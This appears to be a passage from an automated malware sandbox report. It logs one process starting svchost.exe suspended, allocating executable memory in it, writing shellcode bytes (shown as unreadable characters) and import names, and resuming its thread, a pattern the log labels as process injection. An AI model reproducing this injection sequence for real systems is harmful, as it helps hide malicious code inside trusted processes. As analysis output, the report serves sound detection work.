stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000000260000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x0000000000000408
1 0 0

NtAllocateVirtualMemory

process_identifier: 752
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000000270000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x0000000000000408
1 0 0

NtAllocateVirtualMemory

process_identifier: 752
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000000260000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x0000000000000408
1 0 0

NtAllocateVirtualMemory

process_identifier: 752
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000000270000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x0000000000000408
1 0 0

NtAllocateVirtualMemory

process_identifier: 752
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000000260000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x0000000000000408
1 0 0

NtAllocateVirtualMemory

process_identifier: 752
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000000270000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x0000000000000408
1 0 0

NtAllocateVirtualMemory

process_identifier: 752
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000000260000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x0000000000000408
1 0 0

NtAllocateVirtualMemory

process_identifier: 752
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000000270000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x0000000000000408
1 0 0

NtAllocateVirtualMemory

process_identifier: 752
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000000260000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x0000000000000408
1 0 0

NtAllocateVirtualMemory

process_identifier: 752
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000000270000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x0000000000000408
1 0 0

NtAllocateVirtualMemory

process_identifier: 752
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000000260000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x0000000000000408
1 0 0

NtAllocateVirtualMemory

process_identifier: 752
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000000270000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x0000000000000408
1 0 0

NtAllocateVirtualMemory

process_identifier: 752
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000000260000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x0000000000000408
1 0 0

NtAllocateVirtualMemory

process_identifier: 752
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000000270000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x0000000000000408
1 0 0

NtAllocateVirtualMemory

process_identifier: 752
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000000260000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x0000000000000408
1 0 0

NtAllocateVirtualMemory

process_identifier: 752
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000000270000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x0000000000000408
1 0 0

NtAllocateVirtualMemory

process_identifier: 752
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000000260000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x0000000000000408
1 0 0

NtAllocateVirtualMemory

process_identifier: 752
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000000270000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x0000000000000408
1 0 0

NtAllocateVirtualMemory

process_identifier: 752
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000000260000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x0000000000000408
1 0 0

NtAllocateVirtualMemory

process_identifier: 752
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000000270000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x0000000000000408
1 0 0

NtAllocateVirtualMemory

process_identifier: 752
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000000260000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x0000000000000408
1 0 0

NtAllocateVirtualMemory

process_identifier: 752
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000000270000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x0000000000000408
1 0 0

NtAllocateVirtualMemory

process_identifier: 752
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000000260000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x0000000000000408
1 0 0

NtAllocateVirtualMemory

process_identifier: 752
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000000270000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x0000000000000408
1 0 0

NtAllocateVirtualMemory

process_identifier: 752
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000000260000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x0000000000000408
1 0 0

NtAllocateVirtualMemory

process_identifier: 752
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000000270000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x0000000000000408
1 0 0

NtAllocateVirtualMemory

process_identifier: 752
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000000260000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x0000000000000408
1 0 0

NtAllocateVirtualMemory

process_identifier: 752
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000000270000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x0000000000000408
1 0 0

NtAllocateVirtualMemory

process_identifier: 752
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000000260000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x0000000000000408
1 0 0

NtAllocateVirtualMemory

process_identifier: 752
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000000270000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x0000000000000408
1 0 0

NtAllocateVirtualMemory

process_identifier: 752
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000000260000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x0000000000000408
1 0 0

NtAllocateVirtualMemory

process_identifier: 752
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000000270000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x0000000000000408
1 0 0

NtAllocateVirtualMemory

process_identifier: 752
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000000260000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x0000000000000408
1 0 0

NtAllocateVirtualMemory

process_identifier: 752
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000000270000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x0000000000000408
1 0 0

NtAllocateVirtualMemory

process_identifier: 752
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000000260000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x0000000000000408
1 0 0

NtAllocateVirtualMemory

process_identifier: 752
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000000270000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x0000000000000408
1 0 0

NtAllocateVirtualMemory

process_identifier: 752
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000000260000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x0000000000000408
1 0 0

NtAllocateVirtualMemory

process_identifier: 752
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000000270000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x0000000000000408
1 0 0

NtAllocateVirtualMemory

process_identifier: 752
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000000260000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x0000000000000408
1 0 0
Time & API Arguments Status Return Repeated

WriteProcessMemory

buffer: UAVVWSHƒì`Hl$`HƒäðH‹ùë0H‰‡¨ÇGXH‹OÿW0H‹H‹WA¸ÿÿÿÿE3ÉÿW‹GX‹ÈÁáȉL$\‹D$\ƒøuQH‹w`HkF%H‰D$PH‹D$PH=(uVH‹FHL‹V@L‹^8H‹^0L‹N(L‹F H‹NH‹VH‰D$8L‰T$0L‰\$(H‰\$ ëj‹D$\ƒø"„Å3Àé\ÿÿÿH‹D$PH=MuPH‹FPH‹^HL‹V@L‹^8L‹v0L‹N(L‹F H‹NH‹VH‰D$@H‰\$8L‰T$0L‰\$(L‰t$ ÿH‰‡ ¸éóþÿÿHƒ|$PtH‹D$PHƒøouL‹F H‹NH‹VÿëÌÿëÈH‹D$PHƒø%uH‹NÿëµH‹D$PHƒøJ…GÿÿÿH‹NH‹VÿëšHLJ¨H‹H‹WE3ÀE3ÉÿWH‹ÿW(H‹OÿW(HÇGHÇ3ÉÿW83ÀH‹å[_^A^]ÃÌÌÌÌÌÌUVHƒì(Hl$ HƒäðH‹uPH…öt@H‹EH‹M@L‰FxH‰Vp‹ÉH‰ŽˆL‰Ž€H‰¶˜H‰†H‹NÿV0H‹NºÿÿÿÿÿV He^]Ã
base_address: 0x0000000000090000
process_identifier: 752
process_handle: 0x0000000000000408
1 1 0

WriteProcessMemory

buffer:  ,ëv +æv€/æv Ùävð@wÀ/!w0!ww
base_address: 0x00000000000a0000
process_identifier: 752
process_handle: 0x0000000000000408
1 1 0

WriteProcessMemory

buffer: H¹ H¸ ÿà
base_address: 0x00000000ff2c246c
process_identifier: 752
process_handle: 0x0000000000000408
1 1 0

WriteProcessMemory

buffer: VERSION.dll
base_address: 0x0000000000260000
process_identifier: 752
process_handle: 0x0000000000000408
1 1 0

WriteProcessMemory

buffer: €oåv&
base_address: 0x0000000000270000
process_identifier: 752
process_handle: 0x0000000000000408
1 1 0

WriteProcessMemory

buffer:  ,ëv +æv€/æv Ùävð@wÀ/!w0!ww'
base_address: 0x00000000000a0000
process_identifier: 752
process_handle: 0x0000000000000408
1 1 0

WriteProcessMemory

buffer: GetFileVersionInfoA
base_address: 0x0000000000260000
process_identifier: 752
process_handle: 0x0000000000000408
1 1 0

WriteProcessMemory

buffer: 6ævxüþ&
base_address: 0x0000000000270000
process_identifier: 752
process_handle: 0x0000000000000408
1 1 0

WriteProcessMemory

buffer:  ,ëv +æv€/æv Ùävð@wÀ/!w0!ww'
base_address: 0x00000000000a0000
process_identifier: 752
process_handle: 0x0000000000000408
1 1 0

WriteProcessMemory

buffer: VerQueryValueA
base_address: 0x0000000000260000
process_identifier: 752
process_handle: 0x0000000000000408
1 1 0

WriteProcessMemory

buffer: 6ævxüþ&
base_address: 0x0000000000270000
process_identifier: 752
process_handle: 0x0000000000000408
1 1 0

WriteProcessMemory

buffer:  ,ëv +æv€/æv Ùävð@wÀ/!w0!ww'
base_address: 0x00000000000a0000
process_identifier: 752
process_handle: 0x0000000000000408
1 1 0

WriteProcessMemory

buffer: GetFileVersionInfoSizeA
base_address: 0x0000000000260000
process_identifier: 752
process_handle: 0x0000000000000408
1 1 0

WriteProcessMemory

buffer: 6ævxüþ&
base_address: 0x0000000000270000
process_identifier: 752
process_handle: 0x0000000000000408
1 1 0

WriteProcessMemory

buffer:  ,ëv +æv€/æv Ùävð@wÀ/!w0!ww'
base_address: 0x00000000000a0000
process_identifier: 752
process_handle: 0x0000000000000408
1 1 0

WriteProcessMemory

buffer: KERNEL32.dll
base_address: 0x0000000000260000
process_identifier: 752
process_handle: 0x0000000000000408
1 1 0

WriteProcessMemory

buffer: €oåv&
base_address: 0x0000000000270000
process_identifier: 752
process_handle: 0x0000000000000408
1 1 0

WriteProcessMemory

buffer:  ,ëv +æv€/æv Ùävð@wÀ/!w0!ww'
base_address: 0x00000000000a0000
process_identifier: 752
process_handle: 0x0000000000000408
1 1 0

WriteProcessMemory

buffer: GetLastError
base_address: 0x0000000000260000
process_identifier: 752
process_handle: 0x0000000000000408
1 1 0

WriteProcessMemory

buffer: 6æväv&
base_address: 0x0000000000270000
process_identifier: 752
process_handle: 0x0000000000000408
1 1 0

WriteProcessMemory

buffer:  ,ëv +æv€/æv Ùävð@wÀ/!w0!ww'
base_address: 0x00000000000a0000
process_identifier: 752
process_handle: 0x0000000000000408
1 1 0

WriteProcessMemory

buffer: HeapFree
base_address: 0x0000000000260000
process_identifier: 752
process_handle: 0x0000000000000408
1 1 0

WriteProcessMemory

buffer: 6æväv&
base_address: 0x0000000000270000
process_identifier: 752
process_handle: 0x0000000000000408
1 1 0

WriteProcessMemory

buffer:  ,ëv +æv€/æv Ùävð@wÀ/!w0!ww'
base_address: 0x00000000000a0000
process_identifier: 752
process_handle: 0x0000000000000408
1 1 0

WriteProcessMemory

buffer: HeapSize
base_address: 0x0000000000260000
process_identifier: 752
process_handle: 0x0000000000000408
1 1 0

WriteProcessMemory

buffer: 6æväv&
base_address: 0x0000000000270000
process_identifier: 752
process_handle: 0x0000000000000408
1 1 0

WriteProcessMemory

buffer:  ,ëv +æv€/æv Ùävð@wÀ/!w0!ww'
base_address: 0x00000000000a0000
process_identifier: 752
process_handle: 0x0000000000000408
1 1 0

WriteProcessMemory

buffer: HeapReAlloc
base_address: 0x0000000000260000
process_identifier: 752
process_handle: 0x0000000000000408
1 1 0

WriteProcessMemory

buffer: 6æväv&
base_address: 0x0000000000270000
process_identifier: 752
process_handle: 0x0000000000000408
1 1 0

WriteProcessMemory

buffer:  ,ëv +æv€/æv Ùävð@wÀ/!w0!ww'
base_address: 0x00000000000a0000
process_identifier: 752
process_handle: 0x0000000000000408
1 1 0

WriteProcessMemory

buffer: HeapAlloc
base_address: 0x0000000000260000
process_identifier: 752
process_handle: 0x0000000000000408
1 1 0

WriteProcessMemory

buffer: 6æväv&
base_address: 0x0000000000270000
process_identifier: 752
process_handle: 0x0000000000000408
1 1 0

WriteProcessMemory

buffer:  ,ëv +æv€/æv Ùävð@wÀ/!w0!ww'
base_address: 0x00000000000a0000
process_identifier: 752
process_handle: 0x0000000000000408
1 1 0

WriteProcessMemory

buffer: GetProcessHeap
base_address: 0x0000000000260000
process_identifier: 752
process_handle: 0x0000000000000408
1 1 0

WriteProcessMemory

buffer: 6æväv&
base_address: 0x0000000000270000
process_identifier: 752
process_handle: 0x0000000000000408
1 1 0

WriteProcessMemory

buffer:  ,ëv +æv€/æv Ùävð@wÀ/!w0!ww'
base_address: 0x00000000000a0000
process_identifier: 752
process_handle: 0x0000000000000408
1 1 0

WriteProcessMemory

buffer: lstrlenA
base_address: 0x0000000000260000
process_identifier: 752
process_handle: 0x0000000000000408
1 1 0

WriteProcessMemory

buffer: 6æväv&
base_address: 0x0000000000270000
process_identifier: 752
process_handle: 0x0000000000000408
1 1 0

WriteProcessMemory

buffer:  ,ëv +æv€/æv Ùävð@wÀ/!w0!ww'
base_address: 0x00000000000a0000
process_identifier: 752
process_handle: 0x0000000000000408
1 1 0

WriteProcessMemory

buffer: lstrcpyA
base_address: 0x0000000000260000
process_identifier: 752
process_handle: 0x0000000000000408
1 1 0

WriteProcessMemory

buffer: 6æväv&
base_address: 0x0000000000270000
process_identifier: 752
process_handle: 0x0000000000000408
1 1 0

WriteProcessMemory

buffer:  ,ëv +æv€/æv Ùävð@wÀ/!w0!ww'
base_address: 0x00000000000a0000
process_identifier: 752
process_handle: 0x0000000000000408
1 1 0

WriteProcessMemory

buffer: EnterCriticalSection
base_address: 0x0000000000260000
process_identifier: 752
process_handle: 0x0000000000000408
1 1 0

WriteProcessMemory

buffer: 6æväv&
base_address: 0x0000000000270000
process_identifier: 752
process_handle: 0x0000000000000408
1 1 0

WriteProcessMemory

buffer:  ,ëv +æv€/æv Ùävð@wÀ/!w0!ww'
base_address: 0x00000000000a0000
process_identifier: 752
process_handle: 0x0000000000000408
1 1 0

WriteProcessMemory

buffer: LeaveCriticalSection
base_address: 0x0000000000260000
process_identifier: 752
process_handle: 0x0000000000000408
1 1 0

WriteProcessMemory

buffer: 6æväv&
base_address: 0x0000000000270000
process_identifier: 752
process_handle: 0x0000000000000408
1 1 0

WriteProcessMemory

buffer:  ,ëv +æv€/æv Ùävð@wÀ/!w0!ww'
base_address: 0x00000000000a0000
process_identifier: 752
process_handle: 0x0000000000000408
1 1 0

WriteProcessMemory

buffer: InitializeCriticalSection
base_address: 0x0000000000260000
process_identifier: 752
process_handle: 0x0000000000000408
1 1 0

WriteProcessMemory

buffer: 6æväv&
base_address: 0x0000000000270000
process_identifier: 752
process_handle: 0x0000000000000408
1 1 0
Process injection Process 668 resumed a thread in remote process 752
Time & API Arguments Status Return Repeated

NtResumeThread

thread_handle: 0x000000000000040c
suspend_count: 1
process_identifier: 752
1 0 0
Time & API Arguments Status Return Repeated

CreateProcessInternalW

thread_identifier: 2764
thread_handle: 0x000000000000040c
process_identifier: 752
current_directory:
filepath:
track: 1
command_line: C:\Windows\system32\svchost.exe
filepath_r:
stack_pivoted: 0
creation_flags: 4 (CREATE_SUSPENDED)
inherit_handles: 0
process_handle: 0x0000000000000408
1 1 0

NtAllocateVirtualMemory

process_identifier: 752
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000000090000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x0000000000000408
1 0 0

WriteProcessMemory

buffer: UAVVWSHƒì`Hl$`HƒäðH‹ùë0H‰‡¨ÇGXH‹OÿW0H‹H‹WA¸ÿÿÿÿE3ÉÿW‹GX‹ÈÁáȉL$\‹D$\ƒøuQH‹w`HkF%H‰D$PH‹D$PH=(uVH‹FHL‹V@L‹^8H‹^0L‹N(L‹F H‹NH‹VH‰D$8L‰T$0L‰\$(H‰\$ ëj‹D$\ƒø"„Å3Àé\ÿÿÿH‹D$PH=MuPH‹FPH‹^HL‹V@L‹^8L‹v0L‹N(L‹F H‹NH‹VH‰D$@H‰\$8L‰T$0L‰\$(L‰t$ ÿH‰‡ ¸éóþÿÿHƒ|$PtH‹D$PHƒøouL‹F H‹NH‹VÿëÌÿëÈH‹D$PHƒø%uH‹NÿëµH‹D$PHƒøJ…GÿÿÿH‹NH‹VÿëšHLJ¨H‹H‹WE3ÀE3ÉÿWH‹ÿW(H‹OÿW(HÇGHÇ3ÉÿW83ÀH‹å[_^A^]ÃÌÌÌÌÌÌUVHƒì(Hl$ HƒäðH‹uPH…öt@H‹EH‹M@L‰FxH‰Vp‹ÉH‰ŽˆL‰Ž€H‰¶˜H‰†H‹NÿV0H‹NºÿÿÿÿÿV He^]Ã
base_address: 0x0000000000090000
process_identifier: 752
process_handle: 0x0000000000000408
1 1 0

NtAllocateVirtualMemory

process_identifier: 752
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00000000000a0000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x0000000000000408
1 0 0

WriteProcessMemory

buffer:  ,ëv +æv€/æv Ùävð@wÀ/!w0!ww
base_address: 0x00000000000a0000
process_identifier: 752
process_handle: 0x0000000000000408
1 1 0

WriteProcessMemory

buffer: H¹ H¸ ÿà
base_address: 0x00000000ff2c246c
process_identifier: 752
process_handle: 0x0000000000000408
1 1 0

NtResumeThread

thread_handle: 0x000000000000040c
suspend_count: 1
process_identifier: 752
1 0 0

NtAllocateVirtualMemory

process_identifier: 752
region_size: 790528
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000180000000
allocation_type: 8192 (MEM_RESERVE)
process_handle: 0x0000000000000408
1 0 0

NtAllocateVirtualMemory

process_identifier: 752
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 4 (PAGE_READWRITE)
base_address: 0x0000000180000000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0x0000000000000408
1 0 0

NtAllocateVirtualMemory

process_identifier: 752
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000000260000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x0000000000000408
1 0 0

WriteProcessMemory

buffer: VERSION.dll
base_address: 0x0000000000260000
process_identifier: 752
process_handle: 0x0000000000000408
1 1 0

NtAllocateVirtualMemory

process_identifier: 752
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000000270000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x0000000000000408
1 0 0

WriteProcessMemory

buffer: €oåv&
base_address: 0x0000000000270000
process_identifier: 752
process_handle: 0x0000000000000408
1 1 0

WriteProcessMemory

buffer:  ,ëv +æv€/æv Ùävð@wÀ/!w0!ww'
base_address: 0x00000000000a0000
process_identifier: 752
process_handle: 0x0000000000000408
1 1 0

NtAllocateVirtualMemory

process_identifier: 752
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000000260000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x0000000000000408
1 0 0

WriteProcessMemory

buffer: GetFileVersionInfoA
base_address: 0x0000000000260000
process_identifier: 752
process_handle: 0x0000000000000408
1 1 0

NtAllocateVirtualMemory

process_identifier: 752
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000000270000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x0000000000000408
1 0 0

WriteProcessMemory

buffer: 6ævxüþ&
base_address: 0x0000000000270000
process_identifier: 752
process_handle: 0x0000000000000408
1 1 0

WriteProcessMemory

buffer:  ,ëv +æv€/æv Ùävð@wÀ/!w0!ww'
base_address: 0x00000000000a0000
process_identifier: 752
process_handle: 0x0000000000000408
1 1 0

NtAllocateVirtualMemory

process_identifier: 752
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000000260000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x0000000000000408
1 0 0

WriteProcessMemory

buffer: VerQueryValueA
base_address: 0x0000000000260000
process_identifier: 752
process_handle: 0x0000000000000408
1 1 0

NtAllocateVirtualMemory

process_identifier: 752
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000000270000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x0000000000000408
1 0 0

WriteProcessMemory

buffer: 6ævxüþ&
base_address: 0x0000000000270000
process_identifier: 752
process_handle: 0x0000000000000408
1 1 0

WriteProcessMemory

buffer:  ,ëv +æv€/æv Ùävð@wÀ/!w0!ww'
base_address: 0x00000000000a0000
process_identifier: 752
process_handle: 0x0000000000000408
1 1 0

NtAllocateVirtualMemory

process_identifier: 752
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000000260000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x0000000000000408
1 0 0

WriteProcessMemory

buffer: GetFileVersionInfoSizeA
base_address: 0x0000000000260000
process_identifier: 752
process_handle: 0x0000000000000408
1 1 0

NtAllocateVirtualMemory

process_identifier: 752
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000000270000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x0000000000000408
1 0 0

WriteProcessMemory

buffer: 6ævxüþ&
base_address: 0x0000000000270000
process_identifier: 752
process_handle: 0x0000000000000408
1 1 0

WriteProcessMemory

buffer:  ,ëv +æv€/æv Ùävð@wÀ/!w0!ww'
base_address: 0x00000000000a0000
process_identifier: 752
process_handle: 0x0000000000000408
1 1 0

NtAllocateVirtualMemory

process_identifier: 752
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000000260000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x0000000000000408
1 0 0

WriteProcessMemory

buffer: KERNEL32.dll
base_address: 0x0000000000260000
process_identifier: 752
process_handle: 0x0000000000000408
1 1 0

NtAllocateVirtualMemory

process_identifier: 752
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000000270000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x0000000000000408
1 0 0

WriteProcessMemory

buffer: €oåv&
base_address: 0x0000000000270000
process_identifier: 752
process_handle: 0x0000000000000408
1 1 0

WriteProcessMemory

